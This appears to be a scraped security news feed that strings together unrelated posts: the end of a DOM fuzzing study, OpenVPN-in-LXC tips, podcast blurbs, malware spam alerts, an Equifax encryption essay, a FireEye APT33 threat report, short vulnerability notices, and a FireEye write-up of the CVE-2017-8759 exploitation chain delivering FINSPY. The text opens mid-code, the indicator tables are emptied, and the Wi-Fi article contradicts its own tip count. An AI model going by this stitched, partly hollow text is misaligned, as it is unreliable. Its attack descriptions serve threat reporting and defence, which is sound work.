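corpus = fuzz(["<html>"], rounds=20)
```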

The following set of mutations was used to produce new samples from the existing ones:

  • Adding new CSS rules
  • Adding new properties to the existing CSS rules
  • Adding new HTML elements
  • Adding new properties to the existing HTML elements
  • Adding new JavaScript lines. The new lines would be aware of the existing JavaScript variables and could thus reuse them.
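A much-simplified sketch of what such mutations might look like when operating on a sample as a plain string (the helper functions are hypothetical illustrations, not the actual mutation engine):

```python
import random

def add_css_rule(sample):
    # Insert a new CSS rule into the existing stylesheet.
    return sample.replace("</style>", "div { color: red; }</style>", 1)

def add_html_element(sample):
    # Insert a new HTML element into the document body.
    return sample.replace("</body>", "<span id='s1'>x</span></body>", 1)

def add_js_line(sample, known_vars=("a", "b")):
    # New JavaScript lines reuse variables already defined in the sample.
    line = "%s.textContent = String(%s);" % (random.choice(known_vars),
                                             random.choice(known_vars))
    return sample.replace("</script>", line + "</script>", 1)

MUTATIONS = [add_css_rule, add_html_element, add_js_line]

def mutate(sample):
    return random.choice(MUTATIONS)(sample)

base = ("<html><head><style></style></head><body>"
        "<script>var a = document.body; var b = a;</script></body></html>")
mutated = mutate(base)
```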

Unfortunately, while we did see a steady increase in the collected coverage over time while running the fuzzer, it did not result in any new crashes (i.e. crashes that would not be discovered using dumb fuzzing). It would appear more investigation is required in order to combine coverage information with DOM fuzzing in a meaningful way.


As stated before, DOM engines have been one of the largest sources of web browser bugs. While these bugs are far from gone, most browsers show clear progress in this area. The results also highlight the importance of doing continuous security testing, as bugs get introduced with new code and a relatively short period of development can significantly deteriorate a product’s security posture.

The big question at the end is: Are we now at a stage where it is more worthwhile to look for security bugs manually than via fuzzing? Or do more targeted fuzzers need to be created instead of using generic DOM fuzzers to achieve better results? And if we are not there yet - will we be there soon (hopefully)? The answer certainly depends on the browser and the person in question. Instead of attempting to answer these questions myself, I would like to invite the security community to let us know their thoughts.

Tips / Solutions for setting up OpenVPN on Debian 9 within Proxmox / LXC containers

When I tried to migrate my OpenVPN setup to a container on my new Proxmox server I ran into multiple problems, and searching the Internet turned up solutions that did not work or were out of date. So I thought I’d put everything you need to set up OpenVPN on Debian 9 within a Proxmox / LXC container together in one blog post.


Getting a TUN device into the unprivileged container

As you really should run containers in unprivileged mode, the typical solution of adding/allowing

lxc.cgroup.devices.allow: c 10:200 rwm

won’t work. Running a container in privileged mode is a bad idea, but thankfully there is a native LXC solution.

Stop the container with

pct stop <containerid>

Add following line to /etc/pve/lxc/<containerid>.conf

lxc.mount.entry = /dev/net/tun dev/net/tun none bind,create=file

start the container with

pct start <containerid>

OpenVPN will now be able to create a tun device. Just do a test run with

openvpn --config /etc/openvpn/blabla.conf


Add OpenVPN config files to the “autostart”

You need to put the OpenVPN config files into /etc/openvpn/ with the extension .conf. If you add a new file, you need to run

systemctl daemon-reload

before doing a service openvpn restart.

Changes in existing config files don’t need the systemd reload.


Getting systemd to start OpenVPN within an unprivileged container

So OpenVPN now works when started manually, but not with the “init” script. You’ll see the following error message in the log file:
daemon() failed or unsupported: Resource temporarily unavailable (errno=11)

To solve this edit


and put a # in front of


now reload systemd with

systemctl daemon-reload

and it should work.


Hope these tips helped you solve the problems faster than I did. 🙂 If you know other tips / solutions for running OpenVPN in a Debian 9 container within LXC / Proxmox, write a comment! Thx!

Enterprise Security Weekly #62 – Heat Death of the Universe

Paul and John discuss insights into the Equifax data breach. In the news, CyberGRX and BitSight join forces, YARA rules explained, Riverbed teases an application networking offering, and more on this episode of Enterprise Security Weekly! Full Show Notes:

Visit for all the latest episodes!

Malware spam: "Invoice RE-2017-09-21-00xxx" from "Amazon Marketplace"

This fake Amazon spam comes with a malicious attachment:

Subject:  Invoice RE-2017-09-21-00794
From:     "Amazon Marketplace" []
Date:     Thu, September 21, 2017 9:21 am
Priority: Normal

------------- Begin message -------------

Dear customer,

We want to use this opportunity to first say "Thank you very much for your purchase!"

Encryption would NOT have saved Equifax

I read a few articles this week suggesting that the big question for Equifax is whether or not their data was encrypted. The State of Massachusetts, speaking about the lawsuit it filed, said that Equifax "didn't put in safeguards like encryption that would have protected the data." Unfortunately, encryption, as it's most often used in these scenarios, would not have actually prevented the exposure of this data. This breach will have an enormous impact, so we should be careful to get the facts right and provide as much education as possible to law makers and really to anyone else affected.

We know that the attack took advantage of a flaw in Apache Struts (that should have been patched). Struts is a framework for building applications. It lives at the application tier. The data, obviously, resides at the data tier. Once the application was compromised, it really doesn't matter if the data was encrypted because the application is allowed to access (and therefore to decrypt) the data.

I won't get into all the various encryption techniques that are possible but there are two common types of data encryption for these types of applications. There's encryption of data in motion so that nobody can eavesdrop on the conversation as data moves between tiers or travels to the end users. And there's encryption of data at rest that protects data as it's stored on disk so that nobody can pick up the physical disk (or the data file, depending on how the encryption is applied) and access the data. Once the application is authenticated against the database and runs a query against the data, it is able to access, view, and act upon the data even if the data was encrypted while at rest.
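A toy model makes this concrete. The "encryption" below is a stand-in (XOR with a fixed key, not a real cipher, and the record contents are made up), but it shows why at-rest encryption is transparent to anyone who controls the application tier:

```python
# Toy model of an application tier over encrypted-at-rest storage.
# XOR with a fixed key stands in for real encryption -- illustrative only.
KEY = 42

def encrypt(plaintext):
    return bytes(b ^ KEY for b in plaintext.encode())

def decrypt(ciphertext):
    return bytes(b ^ KEY for b in ciphertext).decode()

# Data tier: only ciphertext is ever stored on disk.
database = {"ssn:alice": encrypt("078-05-1120")}

# Application tier: authenticated to the data tier, so it decrypts freely.
def app_query(record_id):
    return decrypt(database[record_id])

# A legitimate request and an attacker who has compromised the app tier
# (say, via a Struts RCE) hit the same code path, so the attacker gets
# plaintext even though the stored bytes were "encrypted".
stolen = app_query("ssn:alice")
```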

Note that there is a commonly-applied technique that applies at-rest encryption at the application tier. I don't want to confuse the conversation with too much detail, but it usually involves inserting some code into the application to encrypt/decrypt. I suspect that if the application is compromised then app-tier encryption would have been equally unhelpful.

The bottom line here is that information security requires a broad, layered defense strategy. There are numerous types of attacks. A strong security program addresses as many potential attack vectors as possible within reason. (My use of "within reason" is a whole other conversation. Security strategies should evaluate risk in terms of likelihood of an attack and the damage that could be caused.) I already wrote about a layered approach to data protection within the database tier. But that same approach of layering security applies to application security (and information security in general). You have to govern the access controls, ensure strong enough authentication, understand user context, identify anomalous behavior, encrypt data, and, of course, patch your software and maintain your infrastructure. This isn't a scientific analysis. I'm just saying that encryption isn't a panacea and probably wouldn't have helped at all in this case.

Equifax says that their "security organization was aware of this vulnerability at that time, and took efforts to identify and to patch any vulnerable systems in the company's IT infrastructure." Clearly, humans need to rely on technology to help identify what systems exist in the environment, what software is installed, which versions, etc. I have no idea what tools Equifax might have used to scan their environment. Maybe the tool failed to find this install. But their use of "at that time" bothers me too. We can't rely on point-in-time assessments. We need continuous evaluations on a never ending cycle. We need better intelligence around our IT infrastructures. And as more workloads move to cloud, we need a unified approach to IT configuration compliance that works across company data centers and multi-cloud environments.

100% protection may be impossible. The best we can do is weigh the risks and apply as much security as possible to mitigate those risks. We should also all be moving to a continuous compliance model where we are actively assessing and reassessing security in real time. And again... layer, layer, layer.

Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware

When discussing suspected Middle Eastern hacker groups with destructive capabilities, many automatically think of the suspected Iranian group that previously used SHAMOON – aka Disttrack – to target organizations in the Persian Gulf. However, over the past few years, we have been tracking a separate, less widely known suspected Iranian group with potential destructive capabilities, whom we call APT33. Our analysis reveals that APT33 is a capable group that has carried out cyber espionage operations since at least 2013. We assess APT33 works at the behest of the Iranian government.

Recent investigations by FireEye’s Mandiant incident response consultants combined with FireEye iSIGHT Threat Intelligence analysis have given us a more complete picture of APT33’s operations, capabilities, and potential motivations. This blog highlights some of our analysis. Our detailed report on FireEye MySIGHT contains a more thorough review of our supporting evidence and analysis. We will also be discussing this threat group further during our webinar on Sept. 21 at 8 a.m. ET.


APT33 has targeted organizations – spanning multiple industries – headquartered in the United States, Saudi Arabia and South Korea. APT33 has shown particular interest in organizations in the aviation sector involved in both military and commercial capacities, as well as organizations in the energy sector with ties to petrochemical production.

From mid-2016 through early 2017, APT33 compromised a U.S. organization in the aerospace sector and targeted a business conglomerate located in Saudi Arabia with aviation holdings.

During the same time period, APT33 also targeted a South Korean company involved in oil refining and petrochemicals. More recently, in May 2017, APT33 appeared to target a Saudi organization and a South Korean business conglomerate using a malicious file that attempted to entice victims with job vacancies for a Saudi Arabian petrochemical company.

We assess that the targeting of multiple companies with aviation-related partnerships to Saudi Arabia indicates that APT33 may be looking to gain insights into Saudi Arabia’s military aviation capabilities to enhance Iran’s domestic aviation capabilities or to support Iran’s military and strategic decision making vis-à-vis Saudi Arabia.

We believe the targeting of the Saudi organization may have been an attempt to gain insight into regional rivals, while the targeting of South Korean companies may be due to South Korea’s recent partnerships with Iran’s petrochemical industry as well as South Korea’s relationships with Saudi petrochemical companies. Iran has expressed interest in growing their petrochemical industry and often posited this expansion in competition to Saudi petrochemical companies. APT33 may have targeted these organizations as a result of Iran’s desire to expand its own petrochemical production and improve its competitiveness within the region. 

The generalized targeting of organizations involved in energy and petrochemicals mirrors previously observed targeting by other suspected Iranian threat groups, indicating a common interest in the sectors across Iranian actors.

Figure 1 shows the global scope of APT33 targeting.

Figure 1: Scope of APT33 Targeting

Spear Phishing

APT33 sent spear phishing emails to employees whose jobs related to the aviation industry. These emails included recruitment themed lures and contained links to malicious HTML application (.hta) files. The .hta files contained job descriptions and links to legitimate job postings on popular employment websites that would be relevant to the targeted individuals.

An example .hta file excerpt is provided in Figure 2. To the user, the file would appear as benign references to legitimate job postings; however, unbeknownst to the user, the .hta file also contained embedded code that automatically downloaded a custom APT33 backdoor.

Figure 2: Excerpt of an APT33 malicious .hta file

We assess APT33 used a built-in phishing module within the publicly available ALFA TEaM Shell (aka ALFASHELL) to send hundreds of spear phishing emails to targeted individuals in 2016. Many of the phishing emails appeared legitimate – they referenced a specific job opportunity and salary, provided a link to the spoofed company’s employment website, and even included the spoofed company’s Equal Opportunity hiring statement. However, in a few cases, APT33 operators left in the default values of the shell’s phishing module. These appear to be mistakes, as minutes after sending the emails with the default values, APT33 sent emails to the same recipients with the default values removed.

As shown in Figure 3, the “fake mail” phishing module in the ALFA Shell contains default values, including the sender email address (solevisible@gmail[.]com), subject line (“your site hacked by me”), and email body (“Hi Dear Admin”).

Figure 3: ALFA TEaM Shell v2-Fake Mail (Default)

Figure 4 shows an example email containing the default values of the shell.

Figure 4: Example Email Generated by the ALFA Shell with Default Values

Domain Masquerading

APT33 registered multiple domains that masquerade as Saudi Arabian aviation companies and Western organizations that together have partnerships to provide training, maintenance and support for Saudi’s military and commercial fleet. Based on observed targeting patterns, APT33 likely used these domains in spear phishing emails to target victim organizations.    

The following domains masquerade as these organizations: Boeing, Alsalam Aircraft Company, Northrop Grumman Aviation Arabia (NGAAKSA), and Vinnell Arabia.






Boeing, Alsalam Aircraft Company, and Saudia Aerospace Engineering Industries entered into a joint venture in 2015 to create the Saudi Rotorcraft Support Center in Saudi Arabia, with the goal of servicing Saudi Arabia’s rotorcraft fleet and building a self-sustaining workforce in the Saudi aerospace supply base.

Alsalam Aircraft Company also offers military and commercial maintenance, technical support, and interior design and refurbishment services.

Two of the domains appeared to mimic Northrop Grumman joint ventures. These joint ventures – Vinnell Arabia and Northrop Grumman Aviation Arabia – provide aviation support in the Middle East, specifically in Saudi Arabia. Both Vinnell Arabia and Northrop Grumman Aviation Arabia have been involved in contracts to train Saudi Arabia’s Ministry of National Guard.

Identified Persona Linked to Iranian Government

We identified APT33 malware tied to an Iranian persona who may have been employed by the Iranian government to conduct cyber threat activity against its adversaries.

We assess an actor using the handle “xman_1365_x” may have been involved in the development and potential use of APT33’s TURNEDUP backdoor due to the inclusion of the handle in the program database (PDB) paths of many of the TURNEDUP samples. An example can be seen in Figure 5.

Figure 5: “xman_1365_x" PDB String in TURNEDUP Sample

Xman_1365_x was also a community manager in the Barnamenevis Iranian programming and software engineering forum, and registered accounts in the well-known Iranian Shabgard and Ashiyane forums, though we did not find evidence to suggest that this actor was ever a formal member of the Shabgard or Ashiyane hacktivist groups.

Open source reporting links the “xman_1365_x” actor to the “Nasr Institute,” which is purported to be equivalent to Iran’s “cyber army” and controlled by the Iranian government. Separately, additional evidence ties the “Nasr Institute” to the 2011-2013 attacks on the financial industry, a series of denial of service attacks dubbed Operation Ababil. In March 2016, the U.S. Department of Justice unsealed an indictment that named two individuals allegedly hired by the Iranian government to build attack infrastructure and conduct distributed denial of service attacks in support of Operation Ababil. While the individuals and the activity described in indictment are different than what is discussed in this report, it provides some evidence that individuals associated with the “Nasr Institute” may have ties to the Iranian government.

Potential Ties to Destructive Capabilities and Comparisons with SHAMOON

One of the droppers used by APT33, which we refer to as DROPSHOT, has been linked to the wiper malware SHAPESHIFT. Open source research indicates SHAPESHIFT may have been used to target organizations in Saudi Arabia.

Although we have only directly observed APT33 use DROPSHOT to deliver the TURNEDUP backdoor, we have identified multiple DROPSHOT samples in the wild that drop SHAPESHIFT. The SHAPESHIFT malware is capable of wiping disks, erasing volumes and deleting files, depending on its configuration. Both DROPSHOT and SHAPESHIFT contain Farsi language artifacts, which indicates they may have been developed by a Farsi language speaker (Farsi is the predominant and official language of Iran).

While we have not directly observed APT33 use SHAPESHIFT or otherwise carry out destructive operations, APT33 is the only group that we have observed use the DROPSHOT dropper. It is possible that DROPSHOT may be shared amongst Iran-based threat groups, but we do not have any evidence that this is the case.

In March 2017, Kaspersky released a report that compared DROPSHOT (which they call Stonedrill) with the most recent variant of SHAMOON (referred to as Shamoon 2.0). They stated that both wipers employ anti-emulation techniques and were used to target organizations in Saudi Arabia, but also mentioned several differences. For example, they stated DROPSHOT uses more advanced anti-emulation techniques, utilizes external scripts for self-deletion, and uses memory injection versus external drivers for deployment. Kaspersky also noted the difference in resource language sections: SHAMOON embeds Arabic-Yemen language resources while DROPSHOT embeds Farsi (Persian) language resources.

We have also observed differences in both targeting and tactics, techniques and procedures (TTPs) associated with the group using SHAMOON and APT33. For example, we have observed SHAMOON being used to target government organizations in the Middle East, whereas APT33 has targeted several commercial organizations both in the Middle East and globally. APT33 has also utilized a wide range of custom and publicly available tools during their operations. In contrast, we have not observed the full lifecycle of operations associated with SHAMOON, in part due to the wiper removing artifacts of the earlier stages of the attack lifecycle.

Regardless of whether DROPSHOT is exclusive to APT33, both the malware and the threat activity appear to be distinct from the group using SHAMOON. Therefore, we assess there may be multiple Iran-based threat groups capable of carrying out destructive operations.

Additional Ties Bolster Attribution to Iran

APT33’s targeting of organizations involved in aerospace and energy most closely aligns with nation-state interests, implying that the threat actor is most likely government sponsored. This coupled with the timing of operations – which coincides with Iranian working hours – and the use of multiple Iranian hacker tools and name servers bolsters our assessment that APT33 may have operated on behalf of the Iranian government.

The times of day that APT33 threat actors were active suggests that they were operating in a time zone close to 04:30 hours ahead of Coordinated Universal Time (UTC). The time of the observed attacker activity coincides with Iran’s Daylight Time, which is +0430 UTC.

APT33 largely operated on days that correspond to Iran’s workweek, Saturday to Wednesday. This is evident from the lack of attacker activity on Thursday, as shown in Figure 6. Public sources report that Iran works a Saturday to Wednesday or Saturday to Thursday work week, with government offices closed on Thursday and some private businesses operating on a half-day schedule on Thursday. Many other Middle East countries have a Friday and Saturday weekend. Iran is one of the few countries that subscribes to a Saturday to Wednesday workweek.
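The timestamp bucketing behind this kind of analysis is straightforward to reproduce. The timestamps below are made-up examples, not actual APT33 activity data:

```python
from datetime import datetime, timedelta, timezone

# Iran Daylight Time is UTC+04:30.
IRDT = timezone(timedelta(hours=4, minutes=30))

def irdt_weekday(utc_timestamp):
    """Convert a UTC timestamp string to IRDT and return the local weekday."""
    utc = datetime.fromisoformat(utc_timestamp).replace(tzinfo=timezone.utc)
    return utc.astimezone(IRDT).strftime("%A")

# Hypothetical activity timestamps in UTC:
days = [irdt_weekday("2017-05-06 03:00:00"),   # 07:30 local time
        irdt_weekday("2017-05-10 12:00:00")]   # 16:30 local time
```

Counting activity by local weekday this way is what produces the Saturday-to-Wednesday pattern described above.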

APT33 leverages popular Iranian hacker tools and DNS servers used by other suspected Iranian threat groups. The publicly available backdoors and tools utilized by APT33 – including NANOCORE, NETWIRE, and ALFA Shell – are all available on Iranian hacking websites, associated with Iranian hackers, and used by other suspected Iranian threat groups. While not conclusive by itself, the use of publicly available Iranian hacking tools and popular Iranian hosting companies may be a result of APT33’s familiarity with them and lends support to the assessment that APT33 may be based in Iran.

Figure 6: APT33 Interactive Commands by Day of Week

Outlook and Implications

Based on observed targeting, we believe APT33 engages in strategic espionage by targeting geographically diverse organizations across multiple industries. Specifically, the targeting of organizations in the aerospace and energy sectors indicates that the threat group is likely in search of strategic intelligence capable of benefitting a government or military sponsor. APT33’s focus on aviation may indicate the group’s desire to gain insight into regional military aviation capabilities to enhance Iran’s aviation capabilities or to support Iran’s military and strategic decision making. Their targeting of multiple holding companies and organizations in the energy sector aligns with Iranian national priorities for growth, especially as it relates to increasing petrochemical production. We expect APT33 activity will continue to cover a broad scope of targeted entities, and may spread into other regions and sectors as Iranian interests dictate.

APT33’s use of multiple custom backdoors suggests that they have access to some of their own development resources, with which they can support their operations, while also making use of publicly available tools. The ties to SHAPESHIFT may suggest that APT33 engages in destructive operations or that they share tools or a developer with another Iran-based threat group that conducts destructive operations.


Malware Family Descriptions

Malware Family




Dropper that has been observed dropping and launching the TURNEDUP backdoor, as well as the SHAPESHIFT wiper malware



Publicly available remote access Trojan (RAT) available for purchase. It is a full-featured backdoor with a plugin framework



Backdoor that attempts to steal credentials from the local machine from a variety of sources and supports other standard backdoor features.



Backdoor capable of uploading and downloading files, creating a reverse shell, taking screenshots, and gathering system information


Indicators of Compromise

APT33 Domains Likely Used in Initial Targeting







APT33 Domains / IPs Used for C2

C2 Domain






















Publicly Available Tools used by APT33



Compile Time (UTC)



2017/1/11 2:20



2016/3/9 23:48



2016/6/29 13:44



2016/5/29 14:11

Unattributed DROPSHOT / SHAPESHIFT MD5 Hashes



Compile Time (UTC)




n/a - timestomped



n/a - timestomped



2016/11/14 21:16:40



2016/11/14 21:16:40

APT33 Malware MD5 Hashes

Compile Times (UTC):
  • 2016/10/19 14:26
  • 2014/6/1 11:01
  • 2016/9/18 10:50
  • 2016/3/8 12:34
  • 2016/3/8 12:34
  • 2015/3/12 5:59
  • 2015/3/12 5:59
  • 2015/3/12 5:59
  • 2015/3/9 16:56
  • 2015/3/9 16:56
  • 2015/3/9 16:56
  • 2015/3/9 16:56
  • 2014/6/1 11:01
  • 2014/6/1 11:01
  • 2014/6/1 11:01
  • 2014/6/1 11:01
  • 2014/6/1 11:01
  • 2014/6/1 11:01
  • 2014/6/1 11:01
  • 2014/6/1 11:01
  • 2014/6/1 11:01
  • 2014/6/1 11:01
  • 2014/6/1 11:01
  • 2014/6/1 11:01
  • 2014/6/1 11:01
  • 2014/6/1 11:01
  • 2014/6/1 11:01
  • 2014/6/1 11:01
  • 2014/6/1 11:01
  • 2014/6/1 11:01
  • 2013/4/10 10:43
  • 2013/4/10 10:43
  • 2013/4/10 10:43

Telaxus Epesi arbitrary Execute Code Cross Site Scripting Vulnerability

Multiple Cross-Site Scripting (XSS) issues were discovered in EPESI. The vulnerabilities exist due to insufficient filtering of user-supplied data (cid, value, element, mode, tab, form_name, id) passed to the EPESI-master/modules/Utils/RecordBrowser/grid.php URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website.
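For context, this class of bug is conventionally mitigated by escaping user-controlled values before they are reflected into HTML. A generic Python sketch follows (EPESI itself is PHP; the parameter names are borrowed from the advisory purely for illustration):

```python
import html
from urllib.parse import parse_qs

def render_cell(user_supplied: str) -> str:
    # Escape <, >, &, and quotes before echoing user input into HTML.
    return html.escape(user_supplied, quote=True)

# Hypothetical query string using parameter names from the advisory.
query = "value=<script>alert(1)</script>&tab=main"
params = {k: v[0] for k, v in parse_qs(query).items()}
safe = render_cell(params["value"])
assert "<script>" not in safe
```

Output encoding at the point of reflection, rather than input filtering alone, is what closes this class of hole regardless of which parameter the payload arrives in.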

Hack Naked News #141 – September 18, 2017

CCleaner is distributing malware, rogue WordPress plugins, Equifax replaces key staff members, and more. Jason Wood of Paladin Security discusses malicious WordPress plugins on this episode of Hack Naked News! Full Show Notes:

Visit for all the latest episodes!

Heads up: Malware found in Piriform’s CCleaner installer

If you installed the free version of CCleaner after Aug. 15, a couple of nasty programs came along for the ride. Talos Intelligence, a division of Cisco, just published a damning account of malware that it found hiding in the installer for CCleaner 5.33, the version that was released on Aug. 15 and which, according to Talos, was still the primary download on the official CCleaner page on Sept. 11.

After notifying Piriform, CCleaner was, ahem, cleaned up and version 5.34 appeared on Sept. 12.

I just checked, and the current version available from Piriform is version 5.34. (Piriform was bought by antivirus giant Avast in July.)

To read this article in full, please click here

5 Ways to Secure Wi-Fi Networks

Wi-Fi is one entry point hackers can use to get into your network without setting foot inside your building. Wireless is much more open to eavesdroppers than wired networks, which means you have to be more diligent about security.

But there’s a lot more to Wi-Fi security than just setting a simple password. Investing time in learning about and applying enhanced security measures can go a long way toward better protecting your network. Here are six tips to better secure your Wi-Fi network.

Use an inconspicuous network name (SSID)

The service set identifier (SSID) is one of the most basic Wi-Fi network settings. Though it doesn’t seem like the network name could compromise security, it certainly can. Using too common an SSID, like “wireless” or the vendor’s default name, can make it easier for someone to crack the personal mode of WPA or WPA2 security. This is because the key derivation incorporates the SSID, and the password-cracking dictionaries used by hackers are preloaded with common and default SSIDs. Using one of those just makes the hacker’s job easier.
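The SSID's role can be made concrete: in WPA/WPA2-Personal, the pairwise master key (PMK) is derived with PBKDF2-HMAC-SHA1 over the passphrase, salted with the SSID. A short standard-library sketch (the passphrase and SSIDs below are made up):

```python
import hashlib

def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    # WPA2-Personal PMK per IEEE 802.11i: PBKDF2-HMAC-SHA1 with the
    # passphrase as key, the SSID as salt, 4096 iterations, 256-bit output.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(),
                               4096, dklen=32)

# The same passphrase yields a different PMK under a different SSID,
# which is why cracking tables are precomputed per common SSID.
assert wpa2_pmk("correct horse", "linksys") != wpa2_pmk("correct horse", "Oddly-Named-Net")
```

Because the SSID is the salt, a table precomputed for "linksys" is useless against a network with an uncommon name, forcing an attacker back to slow per-network brute force.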

To read this article in full, please click here

Malware spam: "Status of invoice" with .7z attachment

This spam leads to Locky ransomware:

Subject:       Status of invoice
From:       "Rosella Setter" ordering@[redacted]
Date:       Mon, September 18, 2017 9:30 am

Hello,
Could you please let me know the status of the attached invoice? I appreciate your help!
Best regards,
Rosella Setter
Tel: 206-575-8068 x 100
Fax: 206-575-8094
*NEW*   Ordering@[redacted].com
* Kindly note we will be

Startup Security Weekly #55 – Bald, Beautiful Men

Jason Brvenik of NSS Labs joins us. In the news, attributes of a scalable business, founder struggles, how to grow your startup, and updates from AppGuard, Securonix, CashShield, and more on this episode of Startup Security Weekly! Full Show Notes: for all the latest episodes!

Pagekit 1.0.10 Remote Code Execution Vulnerability

An issue was discovered in Pagekit CMS before 1.0.11. A remote attacker is able to reset a registered user's password when the debug toolbar is enabled, and the password can be successfully recovered using this exploit. The SecureLayer7 ID is SL7_PGKT_01.

VirusTotal += Avast Mobile Security

We welcome the Avast Mobile Security scanner to VirusTotal. This engine is specialized in Android and reinforces the participation of Avast that already had a multi-platform scanner in our service. In the words of the company:

"Avast Mobile Security is a complete security solution capable of identifying potentially unwanted (PUP) and malicious apps (TRJ). The app protects millions of endpoints on a daily basis using a wide range of cloud and on-device-based detection capabilities. Our hybrid mix of technology, which includes static and dynamic (behavioral) analysis in conjunction with the latest machine learning algorithms, allows us to provide state of the art malware protection."

Avast has expressed its commitment to follow the recommendations of AMTSO and, in compliance with our policy, facilitates this review by AV-TEST, an AMTSO-member tester.

Enterprise Security Weekly #61 – Crying Uncle

Tom Parker of Accenture joins us. In the news, Bay Dynamics and VMware join forces, confessions of an insecure coder, Flexera acquires BDNA, and more on this episode of Enterprise Security Weekly! Full Show Notes:

Visit for all the latest episodes!

Hack Naked News #140 – September 12, 2017

Bypassing Windows 10 security software, Android is vulnerable (go figure), hacking syringe infusion pumps to deliver fatal doses, and more. Jason Wood of Paladin Security discusses iOS 11 on this episode of Hack Naked News! Full Show Notes: for all the latest episodes!

FireEye Uncovers CVE-2017-8759: Zero-Day Used in the Wild to Distribute FINSPY

FireEye recently detected a malicious Microsoft Office RTF document that leveraged CVE-2017-8759, a SOAP WSDL parser code injection vulnerability. This vulnerability allows a malicious actor to inject arbitrary code during the parsing of SOAP WSDL definition contents. FireEye analyzed a Microsoft Word document where attackers used the arbitrary code injection to download and execute a Visual Basic script that contained PowerShell commands.

FireEye shared the details of the vulnerability with Microsoft and has been coordinating public disclosure timed with the release of a patch to address the vulnerability and security guidance, which can be found here.

FireEye email, endpoint and network products detected the malicious documents.

Vulnerability Used to Target Russian Speakers

The malicious document, “Проект.doc” (MD5: fe5c4d6bb78e170abf5cf3741868ea4c), might have been used to target a Russian speaker. Upon successful exploitation of CVE-2017-8759, the document downloads multiple components (details follow), and eventually launches a FINSPY payload (MD5: a7b990d5f57b244dd17e9a937a41e7f5).

FINSPY malware, also reported as FinFisher or WingBird, is available for purchase as part of a “lawful intercept” capability. Based on this and previous use of FINSPY, we assess with moderate confidence that this malicious document was used by a nation-state to target a Russian-speaking entity for cyber espionage purposes. Additional detections by FireEye’s Dynamic Threat Intelligence system indicate that related activity, though potentially for a different client, might have occurred as early as July 2017.

CVE-2017-8759 WSDL Parser Code Injection

A code injection vulnerability exists in the WSDL parser module within the PrintClientProxy method (System.Runtime.Remoting/metadata/wsdlparser.cs, line 6111). The IsValidUrl method does not perform correct validation when the provided data contains a CRLF sequence. This allows an attacker to inject and execute arbitrary code. A portion of the vulnerable code is shown in Figure 1.

Figure 1: Vulnerable WSDL Parser

When multiple address definitions are provided in a SOAP response, the code inserts the “//base.ConfigureProxy(this.GetType(),” string after the first address, commenting out the remaining addresses. However, if a CRLF sequence is present in the additional addresses, the code following the CRLF will not be commented out. Figure 2 shows that, due to the lack of CRLF validation, a System.Diagnostics.Process.Start method call is injected. The generated code is compiled by the .NET Framework’s csc.exe and loaded by the Office executable as a DLL.

Figure 2: SOAP definition VS Generated code
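The comment-escape failure can be modeled with a few lines of Python. This is a deliberate toy simplification of the code-generation logic described above, not Microsoft's actual wsdlparser.cs code:

```python
def emit_proxy_source(addresses):
    # Toy model: keep the first address and "disable" the rest by
    # prefixing each with a C#-style // line comment.
    lines = ['string url = "%s";' % addresses[0]]
    for extra in addresses[1:]:
        # Flaw: a CRLF inside `extra` starts a fresh source line that
        # the // prefix no longer covers.
        lines.append("// " + extra)
    return "\n".join(lines)

benign = emit_proxy_source(["http://a/svc", "http://b/svc"])
malicious = emit_proxy_source(
    ["http://a/svc",
     'http://b/svc\r\nSystem.Diagnostics.Process.Start("cmd");']
)
# The injected call lands on its own, uncommented line of generated source.
assert malicious.splitlines()[-1].startswith("System.Diagnostics")
```

Once the attacker-controlled statement escapes the line comment, the compiler treats it as ordinary code, which is exactly why compiling attacker-influenced generated source is dangerous without strict input validation.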

The In-the-Wild Attacks

The attacks that FireEye observed in the wild leveraged a Rich Text Format (RTF) document, similar to the CVE-2017-0199 documents we previously reported on. The malicious sample contained an embedded SOAP moniker to facilitate exploitation (Figure 3).

Figure 3: SOAP Moniker

The payload retrieves the malicious SOAP WSDL definition from an attacker-controlled server. The WSDL parser, implemented in the .NET Framework, parses the content and generates .cs source code in the working directory. The .NET Framework’s csc.exe then compiles the generated source code into a library, namely http[url path].dll. Microsoft Office then loads the library, completing the exploitation stage. Figure 4 shows an example library loaded as a result of exploitation.

Figure 4: DLL loaded

Upon successful exploitation, the injected code creates a new process and leverages mshta.exe to retrieve an HTA script named “word.db” from the same server. The HTA script removes the source code, compiled DLL and PDB files from disk, then downloads and executes the FINSPY malware named “left.jpg,” which, in spite of the .jpg extension and “image/jpeg” content-type, is actually an executable. Figure 5 shows the details of the PCAP of this malware transfer.

Figure 5: Live requests

The malware will be placed at %appdata%\Microsoft\Windows\OfficeUpdte-KB[ 6 random numbers ].exe. Figure 6 shows the process creation chain under Process Monitor.

Figure 6: Process Created Chain

The Malware

The “left.jpg” (md5: a7b990d5f57b244dd17e9a937a41e7f5) is a variant of FINSPY. It leverages heavily obfuscated code that employs a built-in virtual machine, among other anti-analysis techniques, to make reversing more difficult. In what is likely another anti-analysis technique, it parses its own full path and searches for the string representation of its own MD5 hash. Many resources, such as analysis tools and sandboxes, rename files/samples to their MD5 hash in order to ensure unique filenames. This variant runs with a mutex of "WininetStartupMutex0".
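That hash check is easy to model. The following is a hypothetical Python equivalent of what such a sample might do, inferred from the description above rather than lifted from FINSPY itself:

```python
import hashlib
import os

def renamed_to_own_hash(path: str) -> bool:
    # Sandboxes and analysis tools commonly rename samples to the MD5
    # of their contents; a sample can detect this by comparing its own
    # basename against its own hash and refusing to run on a match.
    with open(path, "rb") as f:
        digest = hashlib.md5(f.read()).hexdigest()
    name = os.path.splitext(os.path.basename(path))[0].lower()
    return name == digest
```

A sample that finds itself running under a filename equal to its own MD5 could reasonably conclude it is inside an analysis environment and decline to detonate, which is why analysts sometimes re-rename samples to innocuous names before dynamic analysis.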


CVE-2017-8759 is the second zero-day vulnerability used to distribute FINSPY uncovered by FireEye in 2017. These exposures demonstrate the significant resources available to “lawful intercept” companies and their customers. Furthermore, FINSPY has been sold to multiple clients, suggesting the vulnerability was being used against other targets.

It is possible that CVE-2017-8759 was being used by additional actors. While we have not found evidence of this, the zero-day used to distribute FINSPY in April 2017, CVE-2017-0199, was simultaneously being used by a financially motivated actor. If the actors behind FINSPY obtained this vulnerability from the same source used previously, it is possible that source sold it to additional actors.


